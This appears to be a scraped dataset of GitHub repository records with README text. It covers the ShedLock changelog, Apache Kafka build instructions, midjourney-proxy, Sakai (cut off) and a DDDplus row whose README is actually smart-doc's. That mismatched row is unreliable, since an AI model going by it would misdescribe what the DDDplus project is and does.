* Lazy initialization of SqlStatementsSource #258
## 4.11.1
* MongoLockProvider uses mongodb-driver-sync
* Removed deprecated constructors from MongoLockProvider
## 4.10.1
* New Mongo reactive streams driver (thanks @codependent)
## 4.9.3
* Fixed JdbcTemplateLockProvider useDbTime() locking #244 thanks @gjorgievskivlatko
## 4.9.2
* Do not fail on DB type determining code if DB connection is not available
## 4.9.1
* Support for server time in DB2
* removed shedlock-provider-jdbc-internal module
## 4.9.0
* Support for server time in JdbcTemplateLockProvider
* Using custom non-null annotations
* Trimming time precision to milliseconds
* Micronaut upgraded to 1.3.4
* Add automatic DB tests for Oracle, MariaDB and MS SQL.
## 4.8.0
* DynamoDB 2 module introduced (thanks Mark Egan)
* JDBC template code refactored to not log error on failed insert in Postgres
* INSERT .. ON CONFLICT UPDATE is used for Postgres
## 4.7.1
* Make LockAssert.TestHelper public
## 4.7.0
* New module for Hazelcasts 4
* Ability to switch-off LockAssert in unit tests
## 4.6.0
* Support for Meta annotations and annotation inheritance in Spring
## 4.5.2
* Made compatible with PostgreSQL JDBC Driver 42.2.11
## 4.5.1
* Inject redis template
## 4.5.0
* ClockProvider introduced
* MongoLockProvider(MongoDatabase) introduced
## 4.4.0
* Support for non-void returning methods when PROXY_METHOD interception is used
## 4.3.1
* Introduced shedlock-provider-redis-spring-1 to make it work around Spring Data Redis 1 issue #105 (thanks @rygh4775)
## 4.3.0
* Jedis dependency upgraded to 3.2.0
* Support for JedisCluster
* Tests upgraded to JUnit 5
## 4.2.0
* Cassandra provider (thanks @mitjag)
## 4.1.0
* More configuration option for JdbcTemplateProvider
## 4.0.4
* Allow configuration of key prefix in RedisLockProvider #181 (thanks @krm1312)
## 4.0.3
* Fixed junit dependency scope #179
## 4.0.2
* Fix NPE caused by Redisson #178
## 4.0.1
* DefaultLockingTaskExecutor made reentrant #175
## 4.0.0
Version 4.0.0 is a major release changing quite a lot of stuff
* `net.javacrumbs.shedlock.core.SchedulerLock` has been replaced by `net.javacrumbs.shedlock.spring.annotation.SchedulerLock`. The original annotation was in the wrong module and
was too complex. Please use the new annotation; the old one still works, but in a few years it will be removed.
* Default intercept mode changed from `PROXY_SCHEDULER` to `PROXY_METHOD`. The reason is that there were a lot of issues with `PROXY_SCHEDULER` (for example #168). You can still
use `PROXY_SCHEDULER` mode if you specify it manually.
* Support for more readable [duration strings](#duration-specification)
* Support for lock assertion `LockAssert.assertLocked()`
* [Support for Micronaut](#micronaut-integration) added
## 3.0.1
* Fixed bean definition configuration #171
## 3.0.0
* `EnableSchedulerLock.mode` renamed to `interceptMode`
* Use standard Spring AOP configuration to honor Spring Boot config (supports `proxyTargetClass` flag)
* Removed deprecated SpringLockableTaskSchedulerFactoryBean and related classes
* Removed support for XML configuration
## 2.6.0
* Updated dependency to Spring 2.1.9
* Support for lock extensions (beta)
## 2.5.0
* Zookeeper supports *lockAtMostFor* and *lockAtLeastFor* params
* Better debug logging
## 2.4.0
* Fixed potential deadlock in Hazelcast (thanks @HubertTatar)
* Finding class level annotation in proxy method mode (thanks @volkovs)
* ScheduledLockConfigurationBuilder deprecated
## 2.3.0
* LockProvider is initialized lazily so it does not change DataSource initialization order
## 2.2.1
* MongoLockProvider accepts MongoCollection as a constructor param
## 2.2.0
* DynamoDBLockProvider added
## 2.1.0
* MongoLockProvider rewritten to use upsert
* ElasticsearchLockProvider added
## 2.0.1
* AOP proxy and annotation configuration support
## 1.3.0
* Can set Timezone to JdbcTemplateLock provider
## 1.2.0
* Support for Couchbase (thanks to @MoranVaisberg)
## 1.1.1
* Spring RedisLockProvider refactored to use RedisTemplate
## 1.1.0
* Support for transaction manager in JdbcTemplateLockProvider (thanks to @grmblfrz)
## 1.0.0
* Upgraded dependencies to Spring 5 and Spring Data 2
* Removed deprecated net.javacrumbs.shedlock.provider.jedis.JedisLockProvider (use net.javacrumbs.shedlock.provider.redis.jedis.JedisLockProvider instead)
* Removed deprecated SpringLockableTaskSchedulerFactory (use ScheduledLockConfigurationBuilder instead)
## 0.18.2
* Ability to clean lock cache
## 0.18.1
* shedlock-provider-redis-spring made compatible with spring-data-redis 1.x.x
## 0.18.0
* Added shedlock-provider-redis-spring (thanks to @siposr)
* shedlock-provider-jedis moved to shedlock-provider-redis-jedis
## 0.17.0
* Support for SPEL in lock name annotation
## 0.16.1
* Automatically closing TaskExecutor on Spring shutdown
## 0.16.0
* Removed spring-test from shedlock-spring compile time dependencies
* Added Automatic-Module-Names
## 0.15.1
* Hazelcast works with remote cluster
## 0.15.0
* Fixed ScheduledLockConfigurationBuilder interfaces #32
* Hazelcast code refactoring
## 0.14.0
* Support for Hazelcast (thanks to @peyo)
## 0.13.0
* Jedis constructor made more generic (thanks to @mgrzeszczak)
## 0.12.0
* Support for property placeholders in annotation lockAtMostForString/lockAtLeastForString
* Support for composed annotations
* ScheduledLockConfigurationBuilder introduced (deprecating SpringLockableTaskSchedulerFactory)
## 0.11.0
* Support for Redis (thanks to @clamey)
* Checking that lockAtMostFor is in the future
* Checking that lockAtMostFor is larger than lockAtLeastFor
## 0.10.0
* jdbc-template-provider does not participate in task transaction
## 0.9.0
* Support for @SchedulerLock annotations on proxied classes
## 0.8.0
* LockableTaskScheduler made AutoClosable so it's closed upon Spring shutdown
## 0.7.0
* Support for lockAtLeastFor
## 0.6.0
* Possible to configure defaultLockFor time so it does not have to be repeated in every annotation
## 0.5.0
* ZooKeeper nodes created under /shedlock by default
## 0.4.1
* JdbcLockProvider insert does not fail on DataIntegrityViolationException
## 0.4.0
* Extracted LockingTaskExecutor
* LockManager.executeIfNotLocked renamed to executeWithLock
* Default table name in JDBC lock providers
## 0.3.0
* `@SchedulerLock.name` made obligatory
* `@SchedulerLock.lockForMillis` renamed to lockAtMostFor
* Adding plain JDBC LockProvider
* Adding ZooKeepr LockProvider
"
funkygao/cp-ddd-framework,master,1081,262,2020-09-07T14:03:55Z,19098,2,轻量级DDD正向/逆向业务建模框架,支撑复杂业务系统的架构演化!,architecture clean-architecture ddd ddd-architecture dddplus domain-driven-design enterprise-architecture extension framework modeling reverse-engineering,"
DDDplus
A lightweight DDD(Domain Driven Design) enhancement framework for forward/reverse business modeling, supporting complex system architecture evolution!
[![CI](https://github.com/funkygao/cp-ddd-framework/workflows/CI/badge.svg?branch=master)](https://github.com/funkygao/cp-ddd-framework/actions?query=branch%3Amaster+workflow%3ACI)
[![Javadoc](https://img.shields.io/badge/javadoc-Reference-blue.svg)](https://funkygao.github.io/cp-ddd-framework/doc/apidocs/)
[![Maven Central](https://img.shields.io/maven-central/v/io.github.dddplus/dddplus.svg?label=Maven%20Central)](https://central.sonatype.com/namespace/io.github.dddplus)
![Requirement](https://img.shields.io/badge/JDK-8+-blue.svg)
[![Coverage Status](https://img.shields.io/codecov/c/github/funkygao/cp-ddd-framework.svg)](https://codecov.io/gh/funkygao/cp-ddd-framework)
[![Mentioned in Awesome DDD](https://awesome.re/mentioned-badge.svg)](https://github.com/heynickc/awesome-ddd#jvm)
[![Gitter chat](https://img.shields.io/badge/gitter-join%20chat%20%E2%86%92-brightgreen.svg)](https://gitter.im/cp-ddd-framework/community)
![maven](https://img.shields.io/maven-central/v/com.ly.smart-doc/smart-doc)
[![License](https://img.shields.io/badge/license-Apache%202-green.svg)](https://www.apache.org/licenses/LICENSE-2.0)
![number of issues closed](https://img.shields.io/github/issues-closed-raw/smart-doc-group/smart-doc)
![closed pull requests](https://img.shields.io/github/issues-pr-closed/smart-doc-group/smart-doc)
![java version](https://img.shields.io/badge/JAVA-1.8+-green.svg)
[![chinese](https://img.shields.io/badge/chinese-中文文档-brightgreen)](https://smart-doc-group.github.io/#/zh-cn/)
![gitee star](https://gitee.com/smart-doc-team/smart-doc/badge/star.svg)
![git star](https://img.shields.io/github/stars/smart-doc-group/smart-doc.svg)
## Introduce
`smart-doc[smɑːt dɒk]` is a tool that supports `JAVA REST API`, `JAVA WebSocket` and `Apache Dubbo RPC` interface document generation. `Smart-doc` is
based on interface source code analysis to generate interface documents, with zero annotation intrusion. You only need to
write Javadoc comments when developing, and `smart-doc` can help you generate `Markdown` or `HTML5` documents. `smart-doc` does not
need annotations injected into the code like `Swagger` does.
[quick start](https://smart-doc-group.github.io/#/)
## Documentation
* [English](https://smart-doc-group.github.io/#/)
* [中文](https://smart-doc-group.github.io/#/zh-cn/)
## Features
- Zero annotation, zero learning cost, only need to write standard `JAVA` document comments.
- Automatic derivation from source code interface definitions, with powerful return-structure derivation support.
- Support `Spring MVC`, `Spring Boot`, `Spring Boot Web Flux` (endpoints not supported), `Feign`, `JAX-RS`.
- Supports the derivation of asynchronous interface returns such as `Callable`, `Future`, `CompletableFuture`.
- Support `JSR-303`parameter verification specification.
- Support for automatic generation of request examples based on request parameters.
- Support for generating `JSON` return value examples.
- Support for loading source code from outside the project to generate field comments (including the sources jar
package).
- Support for generating multiple formats of documents: `Markdown`,`HTML5`,`Word`,`Asciidoctor`,`Postman Collection 2.0+`,`OpenAPI 3.0`.
- Support the generation of `Jmeter` performance testing scripts.
- Support for exporting error codes and data dictionary codes to API documentation.
- The debug html5 page fully supports file upload and download testing.
- Support `Apache Dubbo RPC`.
## Best Practice
`smart-doc` + [Torna](http://torna.cn) form an industry-leading document generation and management solution: `smart-doc`
analyzes the Java source code and extracts comments to generate API documents without intrusion, and
automatically pushes the documents to the `Torna` enterprise-level interface document management platform.
![smart-doc+torna](https://raw.githubusercontent.com/shalousun/smart-doc/master/images/smart-doc-torna-en.png)
## Building
You can build with the following command (`JDK 1.8` is required to build the master branch):
```
mvn clean install -Dmaven.test.skip=true
```
## TODO
- GRPC
## Who is using
These are just some of the companies using `smart-doc`, listed for reference only. If you are using smart-doc,
please [add your company here](https://github.com/smart-doc-group/smart-doc/issues/12) to tell us about your scenario and help make
`smart-doc` better.
![IFLYTEK](https://raw.githubusercontent.com/smart-doc-group/smart-doc/master/images/known-users/iflytek.png)
## Acknowledgements
Thanks to [JetBrains](https://www.jetbrains.com) for providing a free Open Source license for this project.
## License
`Smart-doc` is under the Apache 2.0 license. See
the [LICENSE](https://github.com/smart-doc-group/smart-doc/blob/master/LICENSE)
file for details.
## Contact
Email: opensource@ly.com
"
apache/kafka,trunk,27284,13446,2011-08-15T18:06:16Z,183068,1084,Mirror of Apache Kafka,kafka scala,"Apache Kafka
=================
See our [web site](https://kafka.apache.org) for details on the project.
You need to have [Java](http://www.oracle.com/technetwork/java/javase/downloads/index.html) installed.
We build and test Apache Kafka with Java 8, 11, 17 and 21. We set the `release` parameter in javac and scalac
to `8` to ensure the generated binaries are compatible with Java 8 or higher (independently of the Java version
used for compilation). Java 8 support project-wide has been deprecated since Apache Kafka 3.0, Java 11 support for
the broker and tools has been deprecated since Apache Kafka 3.7 and removal of both is planned for Apache Kafka 4.0 (
see [KIP-750](https://cwiki.apache.org/confluence/pages/viewpage.action?pageId=181308223) and
[KIP-1013](https://cwiki.apache.org/confluence/pages/viewpage.action?pageId=284789510) for more details).
Scala 2.12 and 2.13 are supported and 2.13 is used by default. Scala 2.12 support has been deprecated since
Apache Kafka 3.0 and will be removed in Apache Kafka 4.0 (see [KIP-751](https://cwiki.apache.org/confluence/pages/viewpage.action?pageId=181308218)
for more details). See below for how to use a specific Scala version or all of the supported Scala versions.
### Build a jar and run it ###
./gradlew jar
Follow instructions in https://kafka.apache.org/quickstart
### Build source jar ###
./gradlew srcJar
### Build aggregated javadoc ###
./gradlew aggregatedJavadoc
### Build javadoc and scaladoc ###
./gradlew javadoc
./gradlew javadocJar # builds a javadoc jar for each module
./gradlew scaladoc
./gradlew scaladocJar # builds a scaladoc jar for each module
./gradlew docsJar # builds both (if applicable) javadoc and scaladoc jars for each module
### Run unit/integration tests ###
./gradlew test # runs both unit and integration tests
./gradlew unitTest
./gradlew integrationTest
### Force re-running tests without code change ###
./gradlew test --rerun
./gradlew unitTest --rerun
./gradlew integrationTest --rerun
### Running a particular unit/integration test ###
./gradlew clients:test --tests RequestResponseTest
### Repeatedly running a particular unit/integration test ###
I=0; while ./gradlew clients:test --tests RequestResponseTest --rerun --fail-fast; do (( I=$I+1 )); echo ""Completed run: $I""; sleep 1; done
### Running a particular test method within a unit/integration test ###
./gradlew core:test --tests kafka.api.ProducerFailureHandlingTest.testCannotSendToInternalTopic
./gradlew clients:test --tests org.apache.kafka.clients.MetadataTest.testTimeToNextUpdate
### Running a particular unit/integration test with log4j output ###
By default, only a small number of log messages are output while testing. You can adjust this by changing the `log4j.properties` file in the module's `src/test/resources` directory.
For example, if you want to see more logs for clients project tests, you can modify [the line](https://github.com/apache/kafka/blob/trunk/clients/src/test/resources/log4j.properties#L21) in `clients/src/test/resources/log4j.properties`
to `log4j.logger.org.apache.kafka=INFO` and then run:
./gradlew cleanTest clients:test --tests NetworkClientTest
And you should see `INFO` level logs in the file under the `clients/build/test-results/test` directory.
### Specifying test retries ###
By default, each failed test is retried once up to a maximum of five retries per test run. Tests are retried at the end of the test task. Adjust these parameters in the following way:
./gradlew test -PmaxTestRetries=1 -PmaxTestRetryFailures=5
See [Test Retry Gradle Plugin](https://github.com/gradle/test-retry-gradle-plugin) for more details.
### Generating test coverage reports ###
Generate coverage reports for the whole project:
./gradlew reportCoverage -PenableTestCoverage=true -Dorg.gradle.parallel=false
Generate coverage for a single module, e.g.:
./gradlew clients:reportCoverage -PenableTestCoverage=true -Dorg.gradle.parallel=false
### Building a binary release gzipped tar ball ###
./gradlew clean releaseTarGz
The release file can be found inside `./core/build/distributions/`.
### Building auto generated messages ###
Sometimes it is only necessary to rebuild the auto-generated RPC message data when switching between branches, as it can
fail due to code changes. You can just run:
./gradlew processMessages processTestMessages
### Running a Kafka broker in KRaft mode
Using compiled files:
KAFKA_CLUSTER_ID=""$(./bin/kafka-storage.sh random-uuid)""
./bin/kafka-storage.sh format -t $KAFKA_CLUSTER_ID -c config/kraft/server.properties
./bin/kafka-server-start.sh config/kraft/server.properties
Using docker image:
docker run -p 9092:9092 apache/kafka:3.7.0
### Running a Kafka broker in ZooKeeper mode
Using compiled files:
./bin/zookeeper-server-start.sh config/zookeeper.properties
./bin/kafka-server-start.sh config/server.properties
>Since ZooKeeper mode is already deprecated and planned to be removed in Apache Kafka 4.0, the docker image only supports running in KRaft mode
### Cleaning the build ###
./gradlew clean
### Running a task with one of the Scala versions available (2.12.x or 2.13.x) ###
*Note that if building the jars with a version other than 2.13.x, you need to set the `SCALA_VERSION` variable or change it in `bin/kafka-run-class.sh` to run the quick start.*
You can pass either the major version (eg 2.12) or the full version (eg 2.12.7):
./gradlew -PscalaVersion=2.12 jar
./gradlew -PscalaVersion=2.12 test
./gradlew -PscalaVersion=2.12 releaseTarGz
### Running a task with all the scala versions enabled by default ###
Invoke the `gradlewAll` script followed by the task(s):
./gradlewAll test
./gradlewAll jar
./gradlewAll releaseTarGz
### Running a task for a specific project ###
This is for `core`, `examples` and `clients`:
./gradlew core:jar
./gradlew core:test
Streams has multiple sub-projects, but you can run all the tests:
./gradlew :streams:testAll
### Listing all gradle tasks ###
./gradlew tasks
### Building IDE project ####
*Note that this is not strictly necessary (IntelliJ IDEA has good built-in support for Gradle projects, for example).*
./gradlew eclipse
./gradlew idea
The `eclipse` task has been configured to use `${project_dir}/build_eclipse` as Eclipse's build directory. Eclipse's default
build directory (`${project_dir}/bin`) clashes with Kafka's scripts directory and we don't use Gradle's build directory
to avoid known issues with this configuration.
### Publishing the jar for all versions of Scala and for all projects to maven ###
The recommended command is:
./gradlewAll publish
For backwards compatibility, the following also works:
./gradlewAll uploadArchives
Please note for this to work you should create/update `${GRADLE_USER_HOME}/gradle.properties` (typically, `~/.gradle/gradle.properties`) and assign the following variables
mavenUrl=
mavenUsername=
mavenPassword=
signing.keyId=
signing.password=
signing.secretKeyRingFile=
### Publishing the streams quickstart archetype artifact to maven ###
For the Streams archetype project, one cannot use gradle to upload to maven; instead the `mvn deploy` command needs to be called at the quickstart folder:
cd streams/quickstart
mvn deploy
Please note for this to work you should create/update user maven settings (typically, `${USER_HOME}/.m2/settings.xml`) to assign the following variables
...
...
<servers>
   <server>
      <id>apache.snapshots.https</id>
      <username>${maven_username}</username>
      <password>${maven_password}</password>
   </server>
   <server>
      <id>apache.releases.https</id>
      <username>${maven_username}</username>
      <password>${maven_password}</password>
   </server>
</servers>
...
...
### Installing ALL the jars to the local Maven repository ###
The recommended command to build for both Scala 2.12 and 2.13 is:
./gradlewAll publishToMavenLocal
For backwards compatibility, the following also works:
./gradlewAll install
### Installing specific projects to the local Maven repository ###
./gradlew -PskipSigning=true :streams:publishToMavenLocal
If needed, you can specify the Scala version with `-PscalaVersion=2.13`.
### Building the test jar ###
./gradlew testJar
### Running code quality checks ###
There are two code quality analysis tools that we regularly run, spotbugs and checkstyle.
#### Checkstyle ####
Checkstyle enforces a consistent coding style in Kafka.
You can run checkstyle using:
./gradlew checkstyleMain checkstyleTest
The checkstyle warnings will be found in `reports/checkstyle/reports/main.html` and `reports/checkstyle/reports/test.html` files in the
subproject build directories. They are also printed to the console. The build will fail if Checkstyle fails.
#### Spotbugs ####
Spotbugs uses static analysis to look for bugs in the code.
You can run spotbugs using:
./gradlew spotbugsMain spotbugsTest -x test
The spotbugs warnings will be found in `reports/spotbugs/main.html` and `reports/spotbugs/test.html` files in the subproject build
directories. Use `-PxmlSpotBugsReport=true` to generate an XML report instead of an HTML one.
### JMH microbenchmarks ###
We use [JMH](https://openjdk.java.net/projects/code-tools/jmh/) to write microbenchmarks that produce reliable results in the JVM.
See [jmh-benchmarks/README.md](https://github.com/apache/kafka/blob/trunk/jmh-benchmarks/README.md) for details on how to run the microbenchmarks.
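For orientation, the general shape of a JMH benchmark class is sketched below; this is a made-up example (class name, payload, and measured operation are illustrative), not one of the benchmarks in `jmh-benchmarks`:
```java
import java.util.concurrent.ThreadLocalRandom;
import java.util.concurrent.TimeUnit;

import org.openjdk.jmh.annotations.Benchmark;
import org.openjdk.jmh.annotations.BenchmarkMode;
import org.openjdk.jmh.annotations.Mode;
import org.openjdk.jmh.annotations.OutputTimeUnit;
import org.openjdk.jmh.annotations.Scope;
import org.openjdk.jmh.annotations.Setup;
import org.openjdk.jmh.annotations.State;

@State(Scope.Benchmark)
@BenchmarkMode(Mode.AverageTime)
@OutputTimeUnit(TimeUnit.NANOSECONDS)
public class ExampleBenchmark {

    private byte[] payload;

    @Setup
    public void setup() {
        // Prepare a fixed payload outside the measured code path.
        payload = new byte[1024];
        ThreadLocalRandom.current().nextBytes(payload);
    }

    @Benchmark
    public int checksum() {
        // The measured operation: a trivial stand-in for real serialization work.
        int sum = 0;
        for (byte b : payload) {
            sum += b;
        }
        return sum;
    }
}
```
The jmh-benchmarks README linked above describes how benchmark classes like this are actually run in this repository.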
### Dependency Analysis ###
The gradle [dependency debugging documentation](https://docs.gradle.org/current/userguide/viewing_debugging_dependencies.html) mentions using the `dependencies` or `dependencyInsight` tasks to debug dependencies for the root project or individual subprojects.
Alternatively, use the `allDeps` or `allDepInsight` tasks for recursively iterating through all subprojects:
./gradlew allDeps
./gradlew allDepInsight --configuration runtimeClasspath --dependency com.fasterxml.jackson.core:jackson-databind
These take the same arguments as the builtin variants.
### Determining if any dependencies could be updated ###
./gradlew dependencyUpdates
### Common build options ###
The following options should be set with a `-P` switch, for example `./gradlew -PmaxParallelForks=1 test`.
* `commitId`: sets the build commit ID as .git/HEAD might not be correct if there are local commits added for build purposes.
* `mavenUrl`: sets the URL of the maven deployment repository (`file://path/to/repo` can be used to point to a local repository).
* `maxParallelForks`: maximum number of test processes to start in parallel. Defaults to the number of processors available to the JVM.
* `maxScalacThreads`: maximum number of worker threads for the scalac backend. Defaults to the lowest of `8` and the number of processors
available to the JVM. The value must be between 1 and 16 (inclusive).
* `ignoreFailures`: ignore test failures from junit
* `showStandardStreams`: shows standard out and standard error of the test JVM(s) on the console.
* `skipSigning`: skips signing of artifacts.
* `testLoggingEvents`: unit test events to be logged, separated by comma. For example `./gradlew -PtestLoggingEvents=started,passed,skipped,failed test`.
* `xmlSpotBugsReport`: enable XML reports for spotBugs. This also disables HTML reports as only one can be enabled at a time.
* `maxTestRetries`: maximum number of retries for a failing test case.
* `maxTestRetryFailures`: maximum number of test failures before retrying is disabled for subsequent tests.
* `enableTestCoverage`: enables test coverage plugins and tasks, including bytecode enhancement of classes required to track said
coverage. Note that this introduces some overhead when running tests, which is why it is disabled by default (the overhead
varies, but 15-20% is a reasonable estimate).
* `keepAliveMode`: configures the keep alive mode for the Gradle compilation daemon - reuse improves start-up time. The values should
be one of `daemon` or `session` (the default is `daemon`). `daemon` keeps the daemon alive until it's explicitly stopped while
`session` keeps it alive until the end of the build session. This currently only affects the Scala compiler, see
https://github.com/gradle/gradle/pull/21034 for a PR that attempts to do the same for the Java compiler.
* `scalaOptimizerMode`: configures the optimizing behavior of the scala compiler, the value should be one of `none`, `method`, `inline-kafka` or
`inline-scala` (the default is `inline-kafka`). `none` is the scala compiler default, which only eliminates unreachable code. `method` also
includes method-local optimizations. `inline-kafka` adds inlining of methods within the kafka packages. Finally, `inline-scala` also
includes inlining of methods within the scala library (which avoids lambda allocations for methods like `Option.exists`). `inline-scala` is
only safe if the Scala library version is the same at compile time and runtime. Since we cannot guarantee this for all cases (for example, users
may depend on the kafka jar for integration tests where they may include a scala library with a different version), we don't enable it by
default. See https://www.lightbend.com/blog/scala-inliner-optimizer for more details.
### Running system tests ###
See [tests/README.md](tests/README.md).
### Running in Vagrant ###
See [vagrant/README.md](vagrant/README.md).
### Contribution ###
Apache Kafka is interested in building the community; we would welcome any thoughts or [patches](https://issues.apache.org/jira/browse/KAFKA). You can reach us [on the Apache mailing lists](http://kafka.apache.org/contact.html).
To contribute follow the instructions here:
* https://kafka.apache.org/contributing.html
"
novicezk/midjourney-proxy,main,4185,2149,2023-04-24T13:43:45Z,5803,170,Proxies the MidJourney Discord channel to enable API-based calls for AI drawing,midjourney midjourney-api,"
midjourney-proxy
English | [中文](./README_CN.md)
Proxy the Discord channel for MidJourney to enable API-based calls for AI drawing
[![GitHub release](https://img.shields.io/static/v1?label=release&message=v2.6.1&color=blue)](https://www.github.com/novicezk/midjourney-proxy)
[![License](https://img.shields.io/badge/license-Apache%202-4EB1BA.svg)](https://www.apache.org/licenses/LICENSE-2.0.html)
## Main Functions
- [x] Supports Imagine instructions and related actions
- [x] Supports adding image base64 as a placeholder when using the Imagine command
- [x] Supports Blend (image blending) and Describe (image to text) commands
- [x] Supports real-time progress tracking of tasks
- [x] Supports translation of Chinese prompts, requires configuration of Baidu Translate or GPT
- [x] Prompt sensitive word pre-detection, supports override adjustment
- [x] User-token connects to WSS (WebSocket Secure), allowing access to error messages and full functionality
- [x] Supports multi-account configuration, with each account able to set up corresponding task queues
**🚀 For more features, please refer to [midjourney-proxy-plus](https://github.com/litter-coder/midjourney-proxy-plus)**
> - [x] Supports all the features of the open-source version
> - [x] Supports Shorten (prompt analysis) command
> - [x] Supports focus shifting: Pan ⬅️ ➡️ ⬆️ ⬇️
> - [x] Supports image zooming: Zoom 🔍
> - [x] Supports local redrawing: Vary (Region) 🖌
> - [x] Supports nearly all associated button actions and the 🎛️ Remix mode
> - [x] Supports retrieving the seed value of images
> - [x] Account pool persistence, dynamic maintenance
> - [x] Supports retrieving account /info and /settings information
> - [x] Account settings configuration
> - [x] Supports Niji bot robot
> - [x] Supports InsightFace face replacement robot
> - [x] Embedded management dashboard page
## Prerequisites for use
1. Register and subscribe to MidJourney, create `your own server and channel`, refer
to https://docs.midjourney.com/docs/quick-start
2. Obtain user Token, server ID, channel ID: [Method of acquisition](./docs/discord-params.md)
## Quick Start
1. `Railway`: Based on the Railway platform, no need for your own server: [Deployment method](./docs/railway-start.md) ;
If Railway is not available, you can start using Zeabur instead.
2. `Zeabur`: Based on the Zeabur platform, no need for your own server: [Deployment method](./docs/zeabur-start.md)
3. `Docker`: Start using Docker on a server or locally: [Deployment method](./docs/docker-start.md)
## Local development
- Depends on Java 17 and Maven
- Change configuration items: Edit src/main/resources/application.yml
- Project execution: Start the main function of ProxyApplication
- After changing the code, build the image: Uncomment VOLUME in the Dockerfile, then
execute `docker build . -t midjourney-proxy`
## Configuration items
- mj.accounts: Refer
to [Account pool configuration](./docs/config.md#%E8%B4%A6%E5%8F%B7%E6%B1%A0%E9%85%8D%E7%BD%AE%E5%8F%82%E8%80%83)
- mj.task-store.type: Task storage method, default is in_memory (in memory, lost after restart), Redis is an alternative
option.
- mj.task-store.timeout: Task storage expiration time, tasks are deleted after expiration, default is 30 days.
- mj.api-secret: API key, if left empty, authentication is not enabled; when calling the API, you need to add the
request header 'mj-api-secret'.
- mj.translate-way: The method for translating Chinese prompts into English, options include null (default), Baidu, or
GPT.
- For more configuration options, see [Configuration items](./docs/config.md)
## Related documentation
1. [API Interface Description](./docs/api.md)
2. [Version Update Log](https://github.com/novicezk/midjourney-proxy/wiki/%E6%9B%B4%E6%96%B0%E8%AE%B0%E5%BD%95)
## Precautions
1. Frequent image generation and similar behaviors may trigger warnings on your Midjourney account. Please use with
caution.
2. For common issues and solutions, see [Wiki / FAQ](https://github.com/novicezk/midjourney-proxy/wiki/FAQ)
3. Interested friends are also welcome to join the discussion group. If the group is full when you scan the code, you
can add the administrator’s WeChat to be invited into the group. Please include the remark: mj join group.
## Application Project
If you have a project that depends on this one and is open source, feel free to contact the author to be added here for
display.
- [wechat-midjourney](https://github.com/novicezk/wechat-midjourney) : A proxy WeChat client that connects to
MidJourney, intended only as an example application scenario, will no longer be updated.
- [chatgpt-web-midjourney-proxy](https://github.com/Dooy/chatgpt-web-midjourney-proxy) : chatgpt web, midjourney,
gpts,tts, whisper A complete UI solution
- [chatnio](https://github.com/Deeptrain-Community/chatnio) : The next-generation AI one-stop solution for B/C end, an aggregated model platform with exquisite UI and powerful functions
- [new-api](https://github.com/Calcium-Ion/new-api) : An API interface management and distribution system compatible with the Midjourney Proxy
- [stable-diffusion-mobileui](https://github.com/yuanyuekeji/stable-diffusion-mobileui) : SDUI, based on this interface
and SD (Stable Diffusion), can be packaged with one click to generate H5 pages and mini-programs.
- [MidJourney-Web](https://github.com/ConnectAI-E/MidJourney-Web) : 🍎 Supercharged Experience For MidJourney On Web UI
## Open API
Provides an unofficial MJ/SD open API. Add the administrator on WeChat for inquiries; please include the remark: api
## Others
If you find this project helpful, please consider giving it a star.
[![Star History Chart](https://api.star-history.com/svg?repos=novicezk/midjourney-proxy&type=Date)](https://star-history.com/#novicezk/midjourney-proxy&Date)
"
sakaiproject/sakai,master,1027,897,2014-12-29T11:14:17Z,509951,80,"Sakai is a freely available, feature-rich technology solution for learning, teaching, research and collaboration. Sakai is an open source software suite developed by a diverse and global adopter community.",education hacktoberfest java lms sakai sakai-cle tomcat vle,"# Sakai Collaboration and Learning Environment (Sakai CLE)
This is the source code for the Sakai CLE.
The master branch is the most current development release, Sakai 24.
The other branches are currently or previously supported releases. See below for more information on the release plan and support schedule.
## Building
[![Build Status](https://travis-ci.org/sakaiproject/sakai.svg?branch=master)](https://travis-ci.org/sakaiproject/sakai)
[![Codacy Badge](https://api.codacy.com/project/badge/Grade/c68908d6bc044e95b453bae7ddcbad4a)](https://www.codacy.com/app/sakaiproject/sakai?utm_source=github.com&utm_medium=referral&utm_content=sakaiproject/sakai&utm_campaign=Badge_Grade)
This is the ""Mini Quick Start"" for more complete steps to get Sakai configured please look at [this guide on the wiki](https://github.com/sakaiproject/sakai/wiki/Quick-Start-from-Source).
To build Sakai you need Java 1.8. Once you have cloned a copy of this repository, you can
build it by running (or `./mvnw install` if you don't have Maven installed):
```
mvn install
```
## Running
Sakai runs on Apache Tomcat 9. Download the latest version from http://tomcat.apache.org and extract the archive.
*Note: Sakai does not work with Tomcat installed via a package from apt-get, yum or other package managers.*
You **must** configure Tomcat according to the instructions on this page:
https://sakaiproject.atlassian.net/wiki/spaces/DOC/pages/17310646930/Sakai+21+Install+Guide+Source
When you are done, deploy Sakai to Tomcat:
```
mvn clean install sakai:deploy -Dmaven.tomcat.home=/path/to/your/tomcat
```
Now start Tomcat:
```
cd /path/to/your/tomcat/bin
./startup.sh && tail -f ../logs/catalina.out
```
Once Sakai has started up (it usually takes around 30 seconds), open your browser and navigate to http://localhost:8080/portal
## Licensing
Sakai is licensed under the [Educational Community License version 2.0](http://opensource.org/licenses/ECL-2.0)
Sakai is an [Apereo Foundation](http://www.apereo.org) project and follows the Foundation's guidelines and requirements for [Contributor License Agreements](https://www.apereo.org/licensing).
## Contributing
See [our dedicated page](CONTRIBUTING.md) for more information on contributing to Sakai.
## Bugs
For filing bugs against Sakai please use our Jira instance: https://jira.sakaiproject.org/
## Nightly servers
For testing out the latest builds go to the [nightly server page](http://nightly2.sakaiproject.org)
## Get in touch
If you have any questions, please join the Sakai developer mailing list. To subscribe, send an email to sakai-dev+subscribe@apereo.org
To see a full list of Sakai email lists and other communication channels, please check out this Sakai wiki page:
https://confluence.sakaiproject.org/display/PMC/Sakai+email+lists
If you want a more immediate response during typical M-F business hours, you could try our Slack channels.
https://apereo.slack.com/signup
If you can't find your ""@institution.edu"" domain on the Apereo signup page, then send an email requesting access for yourself and your institution to either sakai-qa-planners@apereo.org or sakaicoordinator@apereo.org.
## Community supported versions
These versions are actively supported by the community.
Sakai 23.1 ([release](http://source.sakaiproject.org/release/23.1/) | [fixes](https://confluence.sakaiproject.org/display/DOC/23.1+Fixes+by+tool) | [notes](https://confluence.sakaiproject.org/display/DOC/Sakai+23+Release+Notes))
Sakai 22.4 ([release](http://source.sakaiproject.org/release/22.4/) | [fixes](https://confluence.sakaiproject.org/display/DOC/22.4+Fixes+by+tool) | [notes](https://confluence.sakaiproject.org/display/DOC/Sakai+22+Release+Notes))
## Previous community versions which are no longer supported
These versions are no longer supported by the community and will only receive security changes.
